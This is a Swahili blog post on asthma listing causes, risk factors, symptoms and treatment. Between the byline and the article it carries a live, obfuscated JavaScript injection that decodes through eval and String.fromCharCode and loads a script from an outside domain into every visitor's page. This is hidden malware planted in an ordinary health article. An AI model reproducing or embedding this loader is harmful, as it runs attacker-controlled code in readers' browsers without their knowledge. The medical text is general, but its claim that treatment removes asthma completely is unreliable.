Recent Comments

Hizi ndiyo Sababu za Mtu Kupata Pumu

By ventas malack Apr 25, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

PUMU ni ugonjwa hatari sana kwa binadamu huu ugomnjwa huathiri sana sehemu ya kupitisha hewa kwenda kwenye mapafu ya binadamu zinazojulikana kitaalamu kama bronchioles.


MAMBO YANAYOSABABISHA PUMU
1: Matatizo ya kinasaba
2: Uvutaji wa sigara au tumbaku kipindi cha ujauzito
3: Maendeleo ya kiuchumi hasa moshi wa viwandani na vifaa vingine ambapo hupelekea Uchafuzi wa mazingira kama moshi na baadhi ya harufu kali.
4: Baadhi ya wagonjwa wanaotumia dawa za kushusha shinikizo la damu zilizo katika jamii ya beta-blockers kama vile propanolol wapo katika hatari ya kupata shambulio la ugonjwa wa pumu.
5: Magonjwa kwenye mfumo wa kupumua yasabishwayo na baadhi ya virusi na bakteria kama vile rhinovirus, Chlamydia pneumonia au Bordetella pertusis
6: Ongezeko la msongo wa mawazo
7: Upasuaji wakati wa kujifungua caesarian section


VIHATARISHI
Kiuhalisia Uwezekano wa kupata ugonjwa wa pumu huongezeka iwapo mtu:
a) Atakuwa na magonjwa ya mzio kama vile magonjwa ya ngozi (eczema) au homa isababishwayo na aina fulani ya vumbi (hay fever)
b) Atavuta chafya (pollen) kutoka kwenye maua au miti
c) Atajihusisha na uvutaji sigara
d) Ana historia ya ugonjwa wa pumu au mzio kwenye familia
e) Utumiaji wa dawa aina ya aspirin
f) Ana msongo wa mawazo
g) Ana uambukizi wa magonjwa ya virusi kama rhinovirus
h) Mazoezi kupitiliza
i) Anaishi sehemu zenye baridi
j) Ana matatizo katika njia ya chakula (Gastroesophageal reflux disease au GERD)
DALILI ZA UGONJWA WA PUMU
– Kuishiwa na pumzi na kupumua kwa shida (shortness of breath)
– Kutoa sauti kama mtu anayepiga miluzi wakati wa kupumua (wheezing)
– Kukohoa sana (chronic cough) hasa nyakati za usiku au asubuhi.
– Kubana kwa kifua


MATIBABU YA PUMU
1) Tiba ya pumu huhusisha Dawa za kuimarisha na kusafisha mirija ya kupitisha hewa na kuondoa tatizo kabisa.
2) Dawa za kuondoa matatizo kwenye mapafu yanayoweza kusababisha Pumu
3) Kama utakuwa na tatizo, dalili au unahitaji ushauri na Tiba karibu

By ventas malack

Make the World Aware